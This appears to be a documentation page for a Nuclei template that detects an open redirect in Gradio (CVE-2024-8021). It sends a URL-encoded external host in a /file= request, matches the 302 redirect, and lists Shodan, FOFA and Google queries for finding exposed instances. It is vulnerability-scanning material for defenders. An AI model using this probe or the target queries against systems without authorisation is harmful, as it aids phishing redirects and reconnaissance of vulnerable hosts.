Gradio - Open Redirect
ID: CVE-2024-8021
Severity: medium
Author: DhiyaneshDK
Tags: cve,cve2024,redirect,oast,gradio
Description
Section titled “Description”Gradio allows an open redirect bypass via URL encoding, enabling attackers to redirect users to malicious sites. This can lead to phishing attacks and loss of trust in the application.
YAML Source
Section titled “YAML Source”id: CVE-2024-8021
info: name: Gradio - Open Redirect author: DhiyaneshDK severity: medium description: | Gradio allows an open redirect bypass via URL encoding, enabling attackers to redirect users to malicious sites. This can lead to phishing attacks and loss of trust in the application. reference: - https://huntr.com/bounties/adc23067-ec04-47ef-9265-afd452071888 metadata: verified: true max-request: 1 vendor: gradio_project product: gradio shodan-query: - http.html:"__gradio_mode__" - http.title:"gradio" fofa-query: - body="__gradio_mode__" - title="gradio" google-query: intitle:"gradio" tags: cve,cve2024,redirect,oast,gradio
http: - raw: - | GET /file=http%3A%2F%2Foast.pro/ HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header
- type: status status: - 302# digest: 4a0a004730450220679e5b39c2e1f8e8ba597c9d81af085b69e20964f503bee2e0ed5d88b078c9a6022100ae49cfa993b0bebe89a5f325d71b6b311c120af1779ffbe4a92a8f2f75d8bddc:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-8021.yaml"